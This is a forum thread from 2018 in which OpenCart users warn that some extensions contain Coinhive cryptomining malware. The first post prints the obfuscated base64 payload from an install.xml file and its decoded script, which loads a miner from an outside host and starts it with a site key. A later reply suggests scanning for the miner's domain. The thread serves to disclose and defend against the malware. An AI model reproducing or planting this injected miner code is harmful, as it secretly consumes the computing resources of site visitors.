Post by rebeccag » Tue Feb 20, 2018 5:10 am

I have found the 3 extensions are infected with coinhive malware, do not install them

https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab

The install.xml contains this

Code: Select all

		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg=='); 

decodes to this

Code: Select all

<script> document.write("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by OSWorX » Tue Feb 20, 2018 5:42 am

Have you reported the developer and those extensions?

Image


User avatar
Expert Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by IP_CAM » Tue Feb 20, 2018 11:52 am

Well, I have reported them about 10 days ago, but OC does not seem to care much about it,
as it looks. ::)
Ernie

For Sale: Top URL's, including OpenCart V-Pro installed, like seen here:
http://www.bigmax.ch - http://www.ipcam.li - http://www.opencart.li
For Information + URL's offered, please contact me at: jti@jacob.ch
I am NOT available for Custom Support in existing OC Installations!
My Github Repositories: https://github.com/IP-CAM
Image


User avatar
Guru Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rebeccag » Fri Feb 23, 2018 5:59 am

One other used reported they had already reported it about 2 weeks ago, but nothing seams to have happened yet. I sent another support request this morning. I also added warnings to the extensions but the uploader keeps deleting them.

Newbie

Posts

Joined
Thu Feb 01, 2018 1:52 pm

Post by IP_CAM » Fri Feb 23, 2018 7:46 am

Well, it almost looks like taking the last chance, to still generate some income ... ::)
Ernie
Image

Attachments

coinhive.png

coinhive.png (42.01 KiB) Viewed 1576 times


For Sale: Top URL's, including OpenCart V-Pro installed, like seen here:
http://www.bigmax.ch - http://www.ipcam.li - http://www.opencart.li
For Information + URL's offered, please contact me at: jti@jacob.ch
I am NOT available for Custom Support in existing OC Installations!
My Github Repositories: https://github.com/IP-CAM
Image


User avatar
Guru Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by zaidladha » Tue Jun 12, 2018 8:10 am

Who was the developer? Is there a list of infected extensions?

New member

Posts

Joined
Wed Jun 05, 2013 3:07 pm

Post by IP_CAM » Tue Jun 12, 2018 10:40 am

Well, just scan your OC Software for:

Code: Select all

coinhive.com
and if you don't find anyting, you don't have to worry about coinhive :D
Ernie

For Sale: Top URL's, including OpenCart V-Pro installed, like seen here:
http://www.bigmax.ch - http://www.ipcam.li - http://www.opencart.li
For Information + URL's offered, please contact me at: jti@jacob.ch
I am NOT available for Custom Support in existing OC Installations!
My Github Repositories: https://github.com/IP-CAM
Image


User avatar
Guru Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: No registered users and 5 guests